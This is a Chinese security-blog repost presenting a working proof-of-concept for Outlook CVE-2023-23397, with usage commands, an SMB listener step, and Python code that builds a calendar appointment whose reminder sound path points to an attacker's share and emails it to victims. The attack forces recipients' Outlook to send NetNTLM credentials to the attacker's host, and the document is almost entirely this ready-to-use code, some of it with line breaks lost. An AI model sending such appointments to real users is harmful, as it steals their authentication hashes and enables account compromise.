Outlook CVE-2023-23397

渗透技巧 1年前 (2023) admin
264 0 0

        制作了一个简单的 PoC 电子邮件生成器和发件人,具有恶意提醒功能(只是一条消息,无需使用任务或 Cal.Ev.)。

https://github.com/Trackflaw/CVE-2023-23397/blob/main/poc.gif

Outlook CVE-2023-23397

Outlook CVE-2023-23397

Outlook CVE-2023-23397

In one session :


python CVE-2023-23397.py
usage: CVE-2023-23397.py [-h] -p PATHCVE-2023-23397.py: error: the following arguments are required: -p/--path
python CVE-2023-23397.py --path '\yourip'

In a second session (smbserver or responder as you want).

smbserver.py -smb2support SHARE .

import smtplib, datetime, argparsefrom email.mime.multipart import MIMEMultipartfrom email.mime.text import MIMETextfrom email.mime.application import MIMEApplicationfrom email.utils import COMMASPACE, formatdatefrom independentsoft.msg import Message
# Mail configuration : change it !smtp_server = "mail.example.com"smtp_port = 587
sender_email = "[email protected]"sender_password = "P@ssw0rd"
recipients_email = ["[email protected]"]
class Email: def __init__(self, smtp_server, port, username, password, recipient): self.smtp_server = smtp_server self.port = port self.username = username self.password = password self.recipient = recipient
def send(self, subject, body, attachment_path): msg = MIMEMultipart() msg['From'] = self.username msg['To'] = COMMASPACE.join(self.recipient) msg['Date'] = formatdate(localtime=True) msg['Subject'] = subject msg.attach(MIMEText(body))
with open(attachment_path, 'rb') as f: part = MIMEApplication(f.read(), Name=attachment_path) part['Content-Disposition'] = f'attachment; filename="{attachment_path}"' msg.attach(part)
try: server = smtplib.SMTP(self.smtp_server, self.port) server.starttls() server.login(self.username, self.password) server.sendmail(self.username, self.recipient, msg.as_string()) server.quit() print("[+] Malicious appointment sent !")

except Exception as e: print("[-] Error with SMTP server...", e)
parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.')parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True)args = parser.parse_args()
appointment = Message()appointment.message_class = "IPM.Appointment"appointment.subject = "CVE-2023-23397"appointment.body = "New meeting now !"appointment.location = "Paris"appointment.appointment_start_time = datetime.datetime.now()appointment.appointment_end_time = datetime.datetime.now()appointment.reminder_override_default = Trueappointment.reminder_sound_file = args.pathappointment.save("appointment.msg")
email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email)
subject = "Hello There !"body = "Important appointment !"email.send(subject, body, "appointment.msg")



原文始发于微信公众号(Khan安全攻防实验室):Outlook CVE-2023-23397

版权声明:admin 发表于 2023年3月29日 上午8:03。
转载请注明:Outlook CVE-2023-23397 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...